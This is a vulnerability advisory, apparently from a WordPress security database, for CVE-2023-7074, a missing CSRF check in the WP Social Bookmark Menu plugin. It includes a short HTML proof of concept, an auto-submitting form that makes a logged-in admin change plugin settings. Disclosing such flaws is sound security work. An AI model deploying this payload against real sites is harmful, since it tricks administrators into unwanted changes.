WP Social Bookmark Menu <= 1.2 – Settings Update via CSRF | CVE 2023-7074 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=wp-social-bookmark-menu.php" method="POST">
    <input type="text" name="flag_save" value="1">
    <input type="text" name="position" value="onthebottom">
</form>
<script>
    document.forms[0].submit();
</script>

Affects Plugins

wp-social-bookmark-menu

No known fix

References

CVE

URL

https://magos-securitas.com/txt/CVE-2023-7074.txt

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://magos-securitas.com

Verified

Yes

WPVDB ID

7906c349-97b0-4d82-aef0-97a1175ae88e

Timeline

Publicly Published

2024-01-03 (about 2 years ago)

Added

2024-01-03 (about 2 years ago)

Last Updated

2024-01-03 (about 2 years ago)

Other

Published

Title

Published

2024-07-09

Title

SociallyViral <= 1.0.10 - Cross-Site Request Forgery

Published

2023-03-21

Title

Weather Station < 3.8.13 - Mode Switch via CSRF

Published

2025-01-03

Title

NAVER Analytics <= 0.9 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-01-07

Title

Uptime Robot <= 0.1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-09-24

Title

NiceJob < 3.6.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting